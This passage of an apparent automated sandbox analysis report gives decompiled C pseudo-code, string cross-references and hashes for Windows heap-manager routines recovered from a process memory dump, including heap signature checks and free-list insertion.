                                          0x01963e8c
                                          0x01963e8c
                                          0x01963e91
                                          0x00000000
                                          0x01963e91

                                          Strings
                                          • Kernel-MUI-Language-SKU, xrefs: 01963F70
                                          • WindowsExcludedProcs, xrefs: 01963D6F
                                          • Kernel-MUI-Language-Allowed, xrefs: 01963DC0
                                          • Kernel-MUI-Language-Disallowed, xrefs: 01963E97
                                          • Kernel-MUI-Number-Allowed, xrefs: 01963D8C
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                          • API String ID: 0-258546922
                                          • Opcode ID: 17b5ebae708d6c42bb9fd3af2d4715db4083b1d78bcd3c0e37f78f57a129f334
                                          • Instruction ID: 494cd4f32512355e50e909a9234162a35d5b37d8189b56fddc528bba03a3806a
                                          • Opcode Fuzzy Hash: 17b5ebae708d6c42bb9fd3af2d4715db4083b1d78bcd3c0e37f78f57a129f334
                                          • Instruction Fuzzy Hash: 78F12A72D00619EBDB15DFD8C980EEEBBBDFF98650F15046AE509A7250E7349E01CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 29%
                                          			E019540E1(void* __edx) {
                                          				void* _t19;
                                          				void* _t29;
                                          
                                          				_t28 = _t19;
                                          				_t29 = __edx;
                                          				if( *((intOrPtr*)(_t19 + 0x60)) != 0xeeffeeff) {
                                          					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                          						_push("HEAP: ");
                                          						E0195B150();
                                          					} else {
                                          						E0195B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                          					}
                                          					E0195B150("Invalid heap signature for heap at %p", _t28);
                                          					if(_t29 != 0) {
                                          						E0195B150(", passed to %s", _t29);
                                          					}
                                          					_push("\n");
                                          					E0195B150();
                                          					if( *((char*)( *[fs:0x30] + 2)) != 0) {
                                          						 *0x1a46378 = 1;
                                          						asm("int3");
                                          						 *0x1a46378 = 0;
                                          					}
                                          					return 0;
                                          				}
                                          				return 1;
                                          			}





                                          0x019540e6
                                          0x019540e8
                                          0x019540f1
                                          0x019b042d
                                          0x019b044c
                                          0x019b0451
                                          0x019b042f
                                          0x019b0444
                                          0x019b0449
                                          0x019b045d
                                          0x019b0466
                                          0x019b046e
                                          0x019b0474
                                          0x019b0475
                                          0x019b047a
                                          0x019b048a
                                          0x019b048c
                                          0x019b0493
                                          0x019b0494
                                          0x019b0494
                                          0x00000000
                                          0x019b049b
                                          0x00000000

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlAllocateHeap
                                          • API String ID: 0-188067316
                                          • Opcode ID: 0c4da8617c1a9933e613530ddd8404b4c4d3a08ce3d6df0140676c4d79786c13
                                          • Instruction ID: 3eb7d8c8686a966d0d2a0eb63d19f1f187a5ad1d3f8052a9168f7f1ea1b0c2b7
                                          • Opcode Fuzzy Hash: 0c4da8617c1a9933e613530ddd8404b4c4d3a08ce3d6df0140676c4d79786c13
                                          • Instruction Fuzzy Hash: A1012836114281AED3A9DB79A54DF9777BAEBC1F31F18802DF40D5B6819AA89480CB20
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 70%
                                          			E0197A830(intOrPtr __ecx, signed int __edx, signed short _a4) {
                                          				void* _v5;
                                          				signed short _v12;
                                          				intOrPtr _v16;
                                          				signed int _v20;
                                          				signed short _v24;
                                          				signed short _v28;
                                          				signed int _v32;
                                          				signed short _v36;
                                          				signed int _v40;
                                          				intOrPtr _v44;
                                          				intOrPtr _v48;
                                          				signed short* _v52;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __ebp;
                                          				signed int _t131;
                                          				signed char _t134;
                                          				signed int _t138;
                                          				char _t141;
                                          				signed short _t142;
                                          				void* _t146;
                                          				signed short _t147;
                                          				intOrPtr* _t149;
                                          				intOrPtr _t156;
                                          				signed int _t167;
                                          				signed int _t168;
                                          				signed short* _t173;
                                          				signed short _t174;
                                          				intOrPtr* _t182;
                                          				signed short _t184;
                                          				intOrPtr* _t187;
                                          				intOrPtr _t197;
                                          				intOrPtr _t206;
                                          				intOrPtr _t210;
                                          				signed short _t211;
                                          				intOrPtr* _t212;
                                          				signed short _t214;
                                          				signed int _t216;
                                          				intOrPtr _t217;
                                          				signed char _t225;
                                          				signed short _t235;
                                          				signed int _t237;
                                          				intOrPtr* _t238;
                                          				signed int _t242;
                                          				unsigned int _t245;
                                          				signed int _t251;
                                          				intOrPtr* _t252;
                                          				signed int _t253;
                                          				intOrPtr* _t255;
                                          				signed int _t256;
                                          				void* _t257;
                                          				void* _t260;
                                          
                                          				_t256 = __edx;
                                          				_t206 = __ecx;
                                          				_t235 = _a4;
                                          				_v44 = __ecx;
                                          				_v24 = _t235;
                                          				if(_t235 == 0) {
                                          					L41:
                                          					return _t131;
                                          				}
                                          				_t251 = ( *(__edx + 4) ^  *(__ecx + 0x54)) & 0x0000ffff;
                                          				if(_t251 == 0) {
                                          					__eflags =  *0x1a48748 - 1;
                                          					if( *0x1a48748 >= 1) {
                                          						__eflags =  *(__edx + 2) & 0x00000008;
                                          						if(( *(__edx + 2) & 0x00000008) == 0) {
                                          							_t110 = _t256 + 0xfff; // 0xfe7
                                          							__eflags = (_t110 & 0xfffff000) - __edx;
                                          							if((_t110 & 0xfffff000) != __edx) {
                                          								_t197 =  *[fs:0x30];
                                          								__eflags =  *(_t197 + 0xc);
                                          								if( *(_t197 + 0xc) == 0) {
                                          									_push("HEAP: ");
                                          									E0195B150();
                                          									_t260 = _t257 + 4;
                                          								} else {
                                          									E0195B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                          									_t260 = _t257 + 8;
                                          								}
                                          								_push("((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))");
                                          								E0195B150();
                                          								_t257 = _t260 + 4;
                                          								__eflags =  *0x1a47bc8;
                                          								if(__eflags == 0) {
                                          									E01A12073(_t206, 1, _t251, __eflags);
                                          								}
                                          								_t235 = _v24;
                                          							}
                                          						}
                                          					}
                                          				}
                                          				_t134 =  *((intOrPtr*)(_t256 + 6));
                                          				if(_t134 == 0) {
                                          					_t210 = _t206;
                                          					_v48 = _t206;
                                          				} else {
                                          					_t210 = (_t256 & 0xffff0000) - ((_t134 & 0x000000ff) << 0x10) + 0x10000;
                                          					_v48 = _t210;
                                          				}
                                          				_v5 =  *(_t256 + 2);
                                          				do {
                                          					if(_t235 > 0xfe00) {
                                          						_v12 = 0xfe00;
                                          						__eflags = _t235 - 0xfe01;
                                          						if(_t235 == 0xfe01) {
                                          							_v12 = 0xfdf0;
                                          						}
                                          						_t138 = 0;
                                          					} else {
                                          						_v12 = _t235 & 0x0000ffff;
                                          						_t138 = _v5;
                                          					}
                                          					 *(_t256 + 2) = _t138;
                                          					 *(_t256 + 4) =  *(_t206 + 0x54) ^ _t251;
                                          					_t236 =  *((intOrPtr*)(_t210 + 0x18));
                                          					if( *((intOrPtr*)(_t210 + 0x18)) == _t210) {
                                          						_t141 = 0;
                                          					} else {
                                          						_t141 = (_t256 - _t210 >> 0x10) + 1;
                                          						_v40 = _t141;
                                          						if(_t141 >= 0xfe) {
                                          							_push(_t210);
                                          							E01A1A80D(_t236, _t256, _t210, 0);
                                          							_t141 = _v40;
                                          						}
                                          					}
                                          					 *(_t256 + 2) =  *(_t256 + 2) & 0x000000f0;
                                          					 *((char*)(_t256 + 6)) = _t141;
                                          					_t142 = _v12;
                                          					 *_t256 = _t142;
                                          					 *(_t256 + 3) = 0;
                                          					_t211 = _t142 & 0x0000ffff;
                                          					 *((char*)(_t256 + 7)) = 0;
                                          					_v20 = _t211;
                                          					if(( *(_t206 + 0x40) & 0x00000040) != 0) {
                                          						_t119 = _t256 + 0x10; // -8
                                          						E019AD5E0(_t119, _t211 * 8 - 0x10, 0xfeeefeee);
                                          						 *(_t256 + 2) =  *(_t256 + 2) | 0x00000004;
                                          						_t211 = _v20;
                                          					}
                                          					_t252 =  *((intOrPtr*)(_t206 + 0xb4));
                                          					if(_t252 == 0) {
                                          						L56:
                                          						_t212 =  *((intOrPtr*)(_t206 + 0xc0));
                                          						_t146 = _t206 + 0xc0;
                                          						goto L19;
                                          					} else {
                                          						if(_t211 <  *((intOrPtr*)(_t252 + 4))) {
                                          							L15:
                                          							_t185 = _t211;
                                          							goto L17;
                                          						} else {
                                          							while(1) {
                                          								_t187 =  *_t252;
                                          								if(_t187 == 0) {
                                          									_t185 =  *((intOrPtr*)(_t252 + 4)) - 1;
                                          									__eflags =  *((intOrPtr*)(_t252 + 4)) - 1;
                                          									goto L17;
                                          								}
                                          								_t252 = _t187;
                                          								if(_t211 >=  *((intOrPtr*)(_t252 + 4))) {
                                          									continue;
                                          								}
                                          								goto L15;
                                          							}
                                          							while(1) {
                                          								L17:
                                          								_t212 = E0197AB40(_t206, _t252, 1, _t185, _t211);
                                          								if(_t212 != 0) {
                                          									_t146 = _t206 + 0xc0;
                                          									break;
                                          								}
                                          								_t252 =  *_t252;
                                          								_t211 = _v20;
                                          								_t185 =  *(_t252 + 0x14);
                                          							}
                                          							L19:
                                          							if(_t146 != _t212) {
                                          								_t237 =  *(_t206 + 0x4c);
                                          								_t253 = _v20;
                                          								while(1) {
                                          									__eflags = _t237;
                                          									if(_t237 == 0) {
                                          										_t147 =  *(_t212 - 8) & 0x0000ffff;
                                          									} else {
                                          										_t184 =  *(_t212 - 8);
                                          										_t237 =  *(_t206 + 0x4c);
                                          										__eflags = _t184 & _t237;
                                          										if((_t184 & _t237) != 0) {
                                          											_t184 = _t184 ^  *(_t206 + 0x50);
                                          											__eflags = _t184;
                                          										}
                                          										_t147 = _t184 & 0x0000ffff;
                                          									}
                                          									__eflags = _t253 - (_t147 & 0x0000ffff);
                                          									if(_t253 <= (_t147 & 0x0000ffff)) {
                                          										goto L20;
                                          									}
                                          									_t212 =  *_t212;
                                          									__eflags = _t206 + 0xc0 - _t212;
                                          									if(_t206 + 0xc0 != _t212) {
                                          										continue;
                                          									} else {
                                          										goto L20;
                                          									}
                                          									goto L56;
                                          								}
                                          							}
                                          							L20:
                                          							_t149 =  *((intOrPtr*)(_t212 + 4));
                                          							_t33 = _t256 + 8; // -16
                                          							_t238 = _t33;
                                          							_t254 =  *_t149;
                                          							if( *_t149 != _t212) {
                                          								_push(_t212);
                                          								E01A1A80D(0, _t212, 0, _t254);
                                          							} else {
                                          								 *_t238 = _t212;
                                          								 *((intOrPtr*)(_t238 + 4)) = _t149;
                                          								 *_t149 = _t238;
                                          								 *((intOrPtr*)(_t212 + 4)) = _t238;
                                          							}
                                          							 *((intOrPtr*)(_t206 + 0x74)) =  *((intOrPtr*)(_t206 + 0x74)) + ( *_t256 & 0x0000ffff);
                                          							_t255 =  *((intOrPtr*)(_t206 + 0xb4));
                                          							if(_t255 == 0) {
                                          								L36:
                                          								if( *(_t206 + 0x4c) != 0) {
                                          									 *(_t256 + 3) =  *(_t256 + 1) ^  *(_t256 + 2) ^  *_t256;
                                          									 *_t256 =  *_t256 ^  *(_t206 + 0x50);
                                          								}
                                          								_t210 = _v48;
                                          								_t251 = _v12 & 0x0000ffff;
                                          								_t131 = _v20;
                                          								_t235 = _v24 - _t131;
                                          								_v24 = _t235;
                                          								_t256 = _t256 + _t131 * 8;
                                          								if(_t256 >=  *((intOrPtr*)(_t210 + 0x28))) {
                                          									goto L41;
                                          								} else {
                                          									goto L39;
                                          								}
                                          							} else {
                                          								_t216 =  *_t256 & 0x0000ffff;
                                          								_v28 = _t216;
                                          								if(_t216 <  *((intOrPtr*)(_t255 + 4))) {
                                          									L28:
                                          									_t242 = _t216 -  *((intOrPtr*)(_t255 + 0x14));
                                          									_v32 = _t242;
                                          									if( *((intOrPtr*)(_t255 + 8)) != 0) {
                                          										_t167 = _t242 + _t242;
                                          									} else {
                                          										_t167 = _t242;
                                          									}
                                          									 *((intOrPtr*)(_t255 + 0xc)) =  *((intOrPtr*)(_t255 + 0xc)) + 1;
                                          									_t168 = _t167 << 2;
                                          									_v40 = _t168;
                                          									_t206 = _v44;
                                          									_v16 =  *((intOrPtr*)(_t168 +  *((intOrPtr*)(_t255 + 0x20))));
                                          									if(_t216 ==  *((intOrPtr*)(_t255 + 4)) - 1) {
                                          										 *((intOrPtr*)(_t255 + 0x10)) =  *((intOrPtr*)(_t255 + 0x10)) + 1;
                                          									}
                                          									_t217 = _v16;
                                          									if(_t217 != 0) {
                                          										_t173 = _t217 - 8;
                                          										_v52 = _t173;
                                          										_t174 =  *_t173;
                                          										__eflags =  *(_t206 + 0x4c);
                                          										if( *(_t206 + 0x4c) != 0) {
                                          											_t245 =  *(_t206 + 0x50) ^ _t174;
                                          											_v36 = _t245;
                                          											_t225 = _t245 >> 0x00000010 ^ _t245 >> 0x00000008 ^ _t245;
                                          											__eflags = _t245 >> 0x18 - _t225;
                                          											if(_t245 >> 0x18 != _t225) {
                                          												_push(_t225);
                                          												E01A1A80D(_t206, _v52, 0, 0);
                                          											}
                                          											_t174 = _v36;
                                          											_t217 = _v16;
                                          											_t242 = _v32;
                                          										}
                                          										_v28 = _v28 - (_t174 & 0x0000ffff);
                                          										__eflags = _v28;
                                          										if(_v28 > 0) {
                                          											goto L34;
                                          										} else {
                                          											goto L33;
                                          										}
                                          									} else {
                                          										L33:
                                          										_t58 = _t256 + 8; // -16
                                          										 *((intOrPtr*)(_v40 +  *((intOrPtr*)(_t255 + 0x20)))) = _t58;
                                          										_t206 = _v44;
                                          										_t217 = _v16;
                                          										L34:
                                          										if(_t217 == 0) {
                                          											asm("bts eax, edx");
                                          										}
                                          										goto L36;
                                          									}
                                          								} else {
                                          									goto L24;
                                          								}
                                          								while(1) {
                                          									L24:
                                          									_t182 =  *_t255;
                                          									if(_t182 == 0) {
                                          										_t216 =  *((intOrPtr*)(_t255 + 4)) - 1;
                                          										__eflags = _t216;
                                          										goto L28;
                                          									}
                                          									_t255 = _t182;
                                          									if(_t216 >=  *((intOrPtr*)(_t255 + 4))) {
                                          										continue;
                                          									} else {
                                          										goto L28;
                                          									}
                                          								}
                                          								goto L28;
                                          							}
                                          						}
                                          					}
                                          					L39:
                                          				} while (_t235 != 0);
                                          				_t214 = _v12;
                                          				_t131 =  *(_t206 + 0x54) ^ _t214;
                                          				 *(_t256 + 4) = _t131;
                                          				if(_t214 == 0) {
                                          					__eflags =  *0x1a48748 - 1;
                                          					if( *0x1a48748 >= 1) {
                                          						_t127 = _t256 + 0xfff; // 0xfff
                                          						_t131 = _t127 & 0xfffff000;
                                          						__eflags = _t131 - _t256;
                                          						if(_t131 != _t256) {
                                          							_t156 =  *[fs:0x30];
                                          							__eflags =  *(_t156 + 0xc);
                                          							if( *(_t156 + 0xc) == 0) {
                                          								_push("HEAP: ");
                                          								E0195B150();
                                          							} else {
                                          								E0195B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                          							}
                                          							_push("ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock");
                                          							_t131 = E0195B150();
                                          							__eflags =  *0x1a47bc8;
                                          							if(__eflags == 0) {
                                          								_t131 = E01A12073(_t206, 1, _t251, __eflags);
                                          							}
                                          						}
                                          					}
                                          				}
                                          				goto L41;
                                          			}























































                                          0x0197a83a
                                          0x0197a83c
                                          0x0197a83e
                                          0x0197a841
                                          0x0197a844
                                          0x0197a84a
                                          0x0197aa53
                                          0x0197aa59
                                          0x0197aa59
                                          0x0197a858
                                          0x0197a85e
                                          0x0197aaf5
                                          0x0197aafc
                                          0x019c229e
                                          0x019c22a2
                                          0x019c22a8
                                          0x019c22b3
                                          0x019c22b5
                                          0x019c22bb
                                          0x019c22c1
                                          0x019c22c5
                                          0x019c22e6
                                          0x019c22eb
                                          0x019c22f0
                                          0x019c22c7
                                          0x019c22dc
                                          0x019c22e1
                                          0x019c22e1
                                          0x019c22f3
                                          0x019c22f8
                                          0x019c22fd
                                          0x019c2300
                                          0x019c2307
                                          0x019c230e
                                          0x019c230e
                                          0x019c2313
                                          0x019c2313
                                          0x019c22b5
                                          0x019c22a2
                                          0x0197aafc
                                          0x0197a864
                                          0x0197a869
                                          0x0197aa5c
                                          0x0197aa5e
                                          0x0197a86f
                                          0x0197a87f
                                          0x0197a885
                                          0x0197a885
                                          0x0197a88b
                                          0x0197a890
                                          0x0197a896
                                          0x0197ab0c
                                          0x0197ab0f
                                          0x0197ab15
                                          0x019c2320
                                          0x019c2320
                                          0x0197ab1b
                                          0x0197a89c
                                          0x0197a89f
                                          0x0197a8a2
                                          0x0197a8a2
                                          0x0197a8a5
                                          0x0197a8af
                                          0x0197a8b3
                                          0x0197a8b8
                                          0x0197aa66
                                          0x0197a8be
                                          0x0197a8c5
                                          0x0197a8c6
                                          0x0197a8ce
                                          0x019c2328
                                          0x019c2332
                                          0x019c2337
                                          0x019c2337
                                          0x0197a8ce
                                          0x0197a8d4
                                          0x0197a8d8
                                          0x0197a8db
                                          0x0197a8de
                                          0x0197a8e1
                                          0x0197a8e5
                                          0x0197a8e8
                                          0x0197a8f0
                                          0x0197a8f3
                                          0x019c234c
                                          0x019c2350
                                          0x019c2355
                                          0x019c2359
                                          0x019c2359
                                          0x0197a8f9
                                          0x0197a901
                                          0x0197aae4
                                          0x0197aae4
                                          0x0197aaea
                                          0x00000000
                                          0x0197a907
                                          0x0197a90a
                                          0x0197a91d
                                          0x0197a91d
                                          0x00000000
                                          0x0197a910
                                          0x0197a910
                                          0x0197a910
                                          0x0197a914
                                          0x0197a924
                                          0x0197a924
                                          0x0197a924
                                          0x0197a924
                                          0x0197a916
                                          0x0197a91b
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0197a91b
                                          0x0197a925
                                          0x0197a925
                                          0x0197a932
                                          0x0197a936
                                          0x0197a93c
                                          0x0197a93c
                                          0x0197a93c
                                          0x0197ab22
                                          0x0197ab24
                                          0x0197ab27
                                          0x0197ab27
                                          0x0197a942
                                          0x0197a944
                                          0x0197aaba
                                          0x0197aabd
                                          0x0197aac0
                                          0x0197aac0
                                          0x0197aac2
                                          0x0197ab2f
                                          0x0197aac4
                                          0x0197aac4
                                          0x0197aac7
                                          0x0197aaca
                                          0x0197aacc
                                          0x0197aace
                                          0x0197aace
                                          0x0197aace
                                          0x0197aad1
                                          0x0197aad1
                                          0x0197aad7
                                          0x0197aad9
                                          0x00000000
                                          0x00000000
                                          0x019c2361
                                          0x019c2369
                                          0x019c236b
                                          0x00000000
                                          0x019c2371
                                          0x00000000
                                          0x019c2371
                                          0x00000000
                                          0x019c236b
                                          0x0197aac0
                                          0x0197a94a
                                          0x0197a94a
                                          0x0197a94d
                                          0x0197a94d
                                          0x0197a950
                                          0x0197a954
                                          0x019c2376
                                          0x019c2380
                                          0x0197a95a
                                          0x0197a95a
                                          0x0197a95c
                                          0x0197a95f
                                          0x0197a961
                                          0x0197a961
                                          0x0197a967
                                          0x0197a96a
                                          0x0197a972
                                          0x0197aa02
                                          0x0197aa06
                                          0x0197aa10
                                          0x0197aa16
                                          0x0197aa16
                                          0x0197aa1b
                                          0x0197aa21
                                          0x0197aa24
                                          0x0197aa27
                                          0x0197aa29
                                          0x0197aa2c
                                          0x0197aa32
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0197a978
                                          0x0197a978
                                          0x0197a97b
                                          0x0197a981
                                          0x0197a996
                                          0x0197a998
                                          0x0197a99f
                                          0x0197a9a2
                                          0x019c238a
                                          0x0197a9a8
                                          0x0197a9a8
                                          0x0197a9a8
                                          0x0197a9aa
                                          0x0197a9ad
                                          0x0197a9b0
                                          0x0197a9bb
                                          0x0197a9be
                                          0x0197a9c7
                                          0x0197a9c9
                                          0x0197a9c9
                                          0x0197a9cc
                                          0x0197a9d1
                                          0x0197aa6d
                                          0x0197aa70
                                          0x0197aa73
                                          0x0197aa75
                                          0x0197aa79
                                          0x0197aa7e
                                          0x0197aa82
                                          0x0197aa8f
                                          0x0197aa94
                                          0x0197aa96
                                          0x019c2392
                                          0x019c23a1
                                          0x019c23a1
                                          0x0197aa9c
                                          0x0197aa9f
                                          0x0197aaa2
                                          0x0197aaa2
                                          0x0197aaa8
                                          0x0197aaab
                                          0x0197aaaf
                                          0x00000000
                                          0x0197aab5
                                          0x00000000
                                          0x0197aab5
                                          0x0197a9d7
                                          0x0197a9d7
                                          0x0197a9da
                                          0x0197a9e0
                                          0x0197a9e3
                                          0x0197a9e6
                                          0x0197a9e9
                                          0x0197a9eb
                                          0x0197a9fd
                                          0x0197a9fd
                                          0x00000000
                                          0x0197a9eb
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0197a983
                                          0x0197a983
                                          0x0197a983
                                          0x0197a987
                                          0x0197a995
                                          0x0197a995
                                          0x0197a995
                                          0x0197a995
                                          0x0197a989
                                          0x0197a98e
                                          0x00000000
                                          0x0197a990
                                          0x00000000
                                          0x0197a990
                                          0x0197a98e
                                          0x00000000
                                          0x0197a983
                                          0x0197a972
                                          0x0197a90a
                                          0x0197aa34
                                          0x0197aa34
                                          0x0197aa40
                                          0x0197aa43
                                          0x0197aa46
                                          0x0197aa4d
                                          0x019c23ab
                                          0x019c23b2
                                          0x019c23b8
                                          0x019c23be
                                          0x019c23c3
                                          0x019c23c5
                                          0x019c23cb
                                          0x019c23d1
                                          0x019c23d5
                                          0x019c23f6
                                          0x019c23fb
                                          0x019c23d7
                                          0x019c23ec
                                          0x019c23f1
                                          0x019c2403
                                          0x019c2408
                                          0x019c2410
                                          0x019c2417
                                          0x019c2422
                                          0x019c2422
                                          0x019c2417
                                          0x019c23c5
                                          0x019c23b2
                                          0x00000000

                                          Strings
                                          • HEAP[%wZ]: , xrefs: 019C22D7, 019C23E7
                                          • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 019C22F3
                                          • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 019C2403
                                          • HEAP: , xrefs: 019C22E6, 019C23F6
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                                          • API String ID: 0-1657114761
                                          • Opcode ID: 3c895d81db0a388666cec8f20a809f99b3ea3e1da306504802d4515409b7ce6a
                                          • Instruction ID: c6c2df0a21b0ae2e1be1ba4cd0f58acdfe7e99a9abe2a0db5d4771f5e1b6254e
                                          • Opcode Fuzzy Hash: 3c895d81db0a388666cec8f20a809f99b3ea3e1da306504802d4515409b7ce6a
                                          • Instruction Fuzzy Hash: ACD1DF34A002469FDB19CF68C490BBEB7F6FF88700F188569D98E9B346E330A941CB51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 69%
                                          			E0197A229(void* __ecx, void* __edx) {
                                          				signed int _v20;
                                          				char _v24;
                                          				char _v28;
                                          				void* _v44;
                                          				void* _v48;
                                          				void* _v56;
                                          				void* _v60;
                                          				void* __ebx;
                                          				signed int _t55;
                                          				signed int _t57;
                                          				void* _t61;
                                          				intOrPtr _t62;
                                          				void* _t65;
                                          				void* _t71;
                                          				signed char* _t74;
                                          				intOrPtr _t75;
                                          				signed char* _t80;
                                          				intOrPtr _t81;
                                          				void* _t82;
                                          				signed char* _t85;
                                          				signed char _t91;
                                          				void* _t103;
                                          				void* _t105;
                                          				void* _t121;
                                          				void* _t129;
                                          				signed int _t131;
                                          				void* _t133;
                                          
                                          				_t105 = __ecx;
                                          				_t133 = (_t131 & 0xfffffff8) - 0x1c;
                                          				_t103 = __edx;
                                          				_t129 = __ecx;
                                          				E0197DF24(__edx,  &_v28, _t133);
                                          				_t55 =  *(_t129 + 0x40) & 0x00040000;
                                          				asm("sbb edi, edi");
                                          				_t121 = ( ~_t55 & 0x0000003c) + 4;
                                          				if(_t55 != 0) {
                                          					_push(0);
                                          					_push(0x14);
                                          					_push( &_v24);
                                          					_push(3);
                                          					_push(_t129);
                                          					_push(0xffffffff);
                                          					_t57 = E01999730();
                                          					__eflags = _t57;
                                          					if(_t57 < 0) {
                                          						L17:
                                          						_push(_t105);
                                          						E01A1A80D(_t129, 1, _v20, 0);
                                          						_t121 = 4;
                                          						goto L1;
                                          					}
                                          					__eflags = _v20 & 0x00000060;
                                          					if((_v20 & 0x00000060) == 0) {
                                          						goto L17;
                                          					}
                                          					__eflags = _v24 - _t129;
                                          					if(_v24 == _t129) {
                                          						goto L1;
                                          					}
                                          					goto L17;
                                          				}
                                          				L1:
                                          				_push(_t121);
                                          				_push(0x1000);
                                          				_push(_t133 + 0x14);
                                          				_push(0);
                                          				_push(_t133 + 0x20);
                                          				_push(0xffffffff);
                                          				_t61 = E01999660();
                                          				_t122 = _t61;
                                          				if(_t61 < 0) {
                                          					_t62 =  *[fs:0x30];
                                          					 *((intOrPtr*)(_t129 + 0x218)) =  *((intOrPtr*)(_t129 + 0x218)) + 1;
                                          					__eflags =  *(_t62 + 0xc);
                                          					if( *(_t62 + 0xc) == 0) {
                                          						_push("HEAP: ");
                                          						E0195B150();
                                          					} else {
                                          						E0195B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                          					}
                                          					_push( *((intOrPtr*)(_t133 + 0xc)));
                                          					_push( *((intOrPtr*)(_t133 + 0x14)));
                                          					_push(_t129);
                                          					E0195B150("ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t122);
                                          					_t65 = 0;
                                          					L13:
                                          					return _t65;
                                          				}
                                          				_t71 = E01977D50();
                                          				_t124 = 0x7ffe0380;
                                          				if(_t71 != 0) {
                                          					_t74 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                          				} else {
                                          					_t74 = 0x7ffe0380;
                                          				}
                                          				if( *_t74 != 0) {
                                          					_t75 =  *[fs:0x30];
                                          					__eflags =  *(_t75 + 0x240) & 0x00000001;
                                          					if(( *(_t75 + 0x240) & 0x00000001) != 0) {
                                          						E01A1138A(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)),  *((intOrPtr*)(_t133 + 0x10)), 8);
                                          					}
                                          				}
                                          				 *((intOrPtr*)(_t129 + 0x230)) =  *((intOrPtr*)(_t129 + 0x230)) - 1;
                                          				 *((intOrPtr*)(_t129 + 0x234)) =  *((intOrPtr*)(_t129 + 0x234)) -  *((intOrPtr*)(_t133 + 0xc));
                                          				if(E01977D50() != 0) {
                                          					_t80 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                          				} else {
                                          					_t80 = _t124;
                                          				}
                                          				if( *_t80 != 0) {
                                          					_t81 =  *[fs:0x30];
                                          					__eflags =  *(_t81 + 0x240) & 0x00000001;
                                          					if(( *(_t81 + 0x240) & 0x00000001) != 0) {
                                          						__eflags = E01977D50();
                                          						if(__eflags != 0) {
                                          							_t124 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                          							__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                          						}
                                          						E01A11582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t124 & 0x000000ff);
                                          					}
                                          				}
                                          				_t82 = E01977D50();
                                          				_t125 = 0x7ffe038a;
                                          				if(_t82 != 0) {
                                          					_t85 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                                          				} else {
                                          					_t85 = 0x7ffe038a;
                                          				}
                                          				if( *_t85 != 0) {
                                          					__eflags = E01977D50();
                                          					if(__eflags != 0) {
                                          						_t125 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                                          						__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                                          					}
                                          					E01A11582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t125 & 0x000000ff);
                                          				}
                                          				 *((intOrPtr*)(_t129 + 0x20c)) =  *((intOrPtr*)(_t129 + 0x20c)) + 1;
                                          				_t91 =  *(_t103 + 2);
                                          				if((_t91 & 0x00000004) != 0) {
                                          					E019AD5E0( *((intOrPtr*)(_t133 + 0x18)),  *((intOrPtr*)(_t133 + 0x10)), 0xfeeefeee);
                                          					_t91 =  *(_t103 + 2);
                                          				}
                                          				 *(_t103 + 2) = _t91 & 0x00000017;
                                          				_t65 = 1;
                                          				goto L13;
                                          			}






























                                          0x0197a229
